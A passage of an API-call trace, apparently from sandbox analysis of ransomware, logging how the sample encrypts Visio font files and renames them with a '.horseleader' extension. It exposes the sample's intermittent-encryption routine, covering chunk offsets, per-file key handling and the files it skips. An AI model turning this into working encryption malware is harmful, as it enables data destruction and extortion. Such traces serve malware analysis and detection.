Shared\\Fonts\\*") returned 71 [0250.501] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81afcd40, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x8541dd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x8541dd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0250.504] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.504] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\.") returned 71 [0250.504] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.504] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81afcd40, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x8541dd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x8541dd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName="..", cAlternateFileName="")) returned 1 [0250.504] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.504] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\..") returned 72 [0250.504] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.504] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.504] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b362800, ftCreationTime.dwHighDateTime=0x1c10ce8, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2b362800, ftLastWriteTime.dwHighDateTime=0x1c10ce8, nFileSizeHigh=0x0, nFileSizeLow=0x4f2ea, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName="BIGFONT.SHX", cAlternateFileName="")) returned 1 [0250.504] lstrcmpiW (lpString1="BIGFONT.SHX", lpString2="Windows") returned -1 [0250.504] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\BIGFONT.SHX") returned 81 [0250.505] StrStrIW (lpFirst="BIGFONT.SHX", lpSrch=".horseleader") returned 0x0 [0250.505] lstrcmpW (lpString1="BIGFONT.SHX", lpString2="#Decrypt#.txt") returned 1 [0250.505] lstrcmpW (lpString1="BIGFONT.SHX", lpString2="_uninstalling_.png") returned 1 [0250.505] lstrlenW (lpString=".testttjffg") returned 11 [0250.505] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\BIGFONT.SHX", lpSrch=".testttjffg") returned 0x0 [0250.505] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0250.505] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0250.505] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\BIGFONT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\bigfont.shx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0250.506] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\BIGFONT.SHX") returned 81 [0250.506] StrStrW (lpFirst="BIGFONT.SHX", lpSrch=".txt") returned 0x0 [0250.506] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=324330) returned 1 [0250.506] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.507] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.510] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.510] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.511] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x25175, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.511] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.513] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.513] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.513] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x4a2ea, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.513] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.515] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.515] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.516] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.516] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0250.516] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0250.516] CloseHandle (hObject=0x1a4) returned 1 [0250.516] GetProcessHeap () returned 0x780000 [0250.516] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0250.517] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\BIGFONT.SHX.horseleader") returned 93 [0250.517] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\BIGFONT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\bigfont.shx"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\BIGFONT.SHX.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\bigfont.shx.horseleader")) returned 1 [0250.518] GetProcessHeap () returned 0x780000 [0250.518] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0250.518] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b362800, ftCreationTime.dwHighDateTime=0x1c10ce8, ftLastAccessTime.dwLowDateTime=0x81c076e0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2b362800, ftLastWriteTime.dwHighDateTime=0x1c10ce8, nFileSizeHigh=0x0, nFileSizeLow=0xa261d, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName="CHINESET.SHX", cAlternateFileName="")) returned 1 [0250.518] lstrcmpiW (lpString1="CHINESET.SHX", lpString2="Windows") returned -1 [0250.518] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\CHINESET.SHX") returned 82 [0250.518] StrStrIW (lpFirst="CHINESET.SHX", lpSrch=".horseleader") returned 0x0 [0250.518] lstrcmpW (lpString1="CHINESET.SHX", lpString2="#Decrypt#.txt") returned 1 [0250.518] lstrcmpW (lpString1="CHINESET.SHX", lpString2="_uninstalling_.png") returned 1 [0250.518] lstrlenW (lpString=".testttjffg") returned 11 [0250.518] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\CHINESET.SHX", lpSrch=".testttjffg") returned 0x0 [0250.519] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0250.519] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0250.519] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\CHINESET.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\chineset.shx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0250.520] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\CHINESET.SHX") returned 82 [0250.520] StrStrW (lpFirst="CHINESET.SHX", lpSrch=".txt") returned 0x0 [0250.520] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=665117) returned 1 [0250.520] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.520] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.523] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.523] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.524] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x4eb0e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.524] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.526] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.527] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.527] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x9d61d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.527] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.529] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.530] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.530] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.530] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0250.530] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0250.530] CloseHandle (hObject=0x1a4) returned 1 [0250.531] GetProcessHeap () returned 0x780000 [0250.531] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0250.531] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\CHINESET.SHX.horseleader") returned 94 [0250.531] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\CHINESET.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\chineset.shx"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\CHINESET.SHX.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\chineset.shx.horseleader")) returned 1 [0250.532] GetProcessHeap () returned 0x780000 [0250.532] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0250.532] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b362800, ftCreationTime.dwHighDateTime=0x1c10ce8, ftLastAccessTime.dwLowDateTime=0x81eb4fa0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2b362800, ftLastWriteTime.dwHighDateTime=0x1c10ce8, nFileSizeHigh=0x0, nFileSizeLow=0x6a9e6, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName="EXTFONT.SHX", cAlternateFileName="")) returned 1 [0250.532] lstrcmpiW (lpString1="EXTFONT.SHX", lpString2="Windows") returned -1 [0250.533] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\EXTFONT.SHX") returned 81 [0250.533] StrStrIW (lpFirst="EXTFONT.SHX", lpSrch=".horseleader") returned 0x0 [0250.533] lstrcmpW (lpString1="EXTFONT.SHX", lpString2="#Decrypt#.txt") returned 1 [0250.533] lstrcmpW (lpString1="EXTFONT.SHX", lpString2="_uninstalling_.png") returned 1 [0250.533] lstrlenW (lpString=".testttjffg") returned 11 [0250.533] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\EXTFONT.SHX", lpSrch=".testttjffg") returned 0x0 [0250.533] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0250.533] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0250.533] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\EXTFONT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\extfont.shx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0250.534] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\EXTFONT.SHX") returned 81 [0250.534] StrStrW (lpFirst="EXTFONT.SHX", lpSrch=".txt") returned 0x0 [0250.534] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=436710) returned 1 [0250.534] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.534] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.540] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.540] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.541] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x32cf3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.541] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.543] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.543] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.543] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x659e6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.543] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.546] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.546] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.546] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.546] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0250.547] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0250.547] CloseHandle (hObject=0x1a4) returned 1 [0250.547] GetProcessHeap () returned 0x780000 [0250.547] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0250.547] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\EXTFONT.SHX.horseleader") returned 93 [0250.547] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\EXTFONT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\extfont.shx"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\EXTFONT.SHX.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\extfont.shx.horseleader")) returned 1 [0250.548] GetProcessHeap () returned 0x780000 [0250.548] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0250.548] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b362800, ftCreationTime.dwHighDateTime=0x1c10ce8, ftLastAccessTime.dwLowDateTime=0x8207e020, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2b362800, ftLastWriteTime.dwHighDateTime=0x1c10ce8, nFileSizeHigh=0x0, nFileSizeLow=0xdc6b9, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName="GBCBIG.SHX", cAlternateFileName="")) returned 1 [0250.548] lstrcmpiW (lpString1="GBCBIG.SHX", lpString2="Windows") returned -1 [0250.548] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\GBCBIG.SHX") returned 80 [0250.548] StrStrIW (lpFirst="GBCBIG.SHX", lpSrch=".horseleader") returned 0x0 [0250.548] lstrcmpW (lpString1="GBCBIG.SHX", lpString2="#Decrypt#.txt") returned 1 [0250.548] lstrcmpW (lpString1="GBCBIG.SHX", lpString2="_uninstalling_.png") returned 1 [0250.548] lstrlenW (lpString=".testttjffg") returned 11 [0250.549] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\GBCBIG.SHX", lpSrch=".testttjffg") returned 0x0 [0250.549] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0250.549] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0250.549] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\GBCBIG.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\gbcbig.shx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0250.549] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\GBCBIG.SHX") returned 80 [0250.549] StrStrW (lpFirst="GBCBIG.SHX", lpSrch=".txt") returned 0x0 [0250.550] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=902841) returned 1 [0250.550] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.550] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.552] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.553] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.554] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x6bb5c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.554] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.556] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.557] WriteFile (in: hFile=0x1a4, 